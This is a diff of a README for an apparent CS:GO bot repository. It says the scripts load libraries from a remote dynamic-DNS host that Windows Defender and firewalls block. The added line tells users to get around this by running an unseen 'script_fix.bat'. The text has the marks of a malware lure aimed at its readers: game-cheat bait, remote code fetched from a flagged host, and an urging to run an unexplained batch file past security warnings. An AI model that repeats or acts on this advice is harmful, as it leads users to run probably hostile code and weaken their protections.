darkLORD-tr0LL/win_CSGO-bot/README.md

 ## Note: some scripts make calls to external libraries hosted on remote servers
-Known issue with files hosted on jajaja.servehttp.com Some firewalls and Windows Defender may block this address
+Known issue with files hosted on jajaja.servehttp.com Some firewalls and Windows Defender may block this address To fix this issue, restart your computer or run the custom script_fix.bat